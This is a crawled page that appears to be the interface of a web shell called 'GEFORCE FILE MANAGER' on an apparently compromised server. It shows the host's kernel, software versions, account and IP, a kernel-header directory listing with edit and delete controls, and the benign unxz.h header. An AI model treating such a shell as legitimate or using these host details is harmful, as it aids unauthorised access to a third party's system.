[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.56.1.el8_10.x86_64
/
include
/
linux
/
decompress
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 bunzip2.h
305 B
SET
[ EDIT ]
|
[ DEL ]
📄 generic.h
1,523 B
SET
[ EDIT ]
|
[ DEL ]
📄 inflate.h
314 B
SET
[ EDIT ]
|
[ DEL ]
📄 mm.h
1,902 B
SET
[ EDIT ]
|
[ DEL ]
📄 unlz4.h
279 B
SET
[ EDIT ]
|
[ DEL ]
📄 unlzma.h
292 B
SET
[ EDIT ]
|
[ DEL ]
📄 unlzo.h
279 B
SET
[ EDIT ]
|
[ DEL ]
📄 unxz.h
499 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: unxz.h
/* * Wrapper for decompressing XZ-compressed kernel, initramfs, and initrd * * Author: Lasse Collin <lasse.collin@tukaani.org> * * This file has been put into the public domain. * You can do whatever you want with this file. */ #ifndef DECOMPRESS_UNXZ_H #define DECOMPRESS_UNXZ_H int unxz(unsigned char *in, long in_size, long (*fill)(void *dest, unsigned long size), long (*flush)(void *src, unsigned long size), unsigned char *out, long *in_used, void (*error)(char *x)); #endif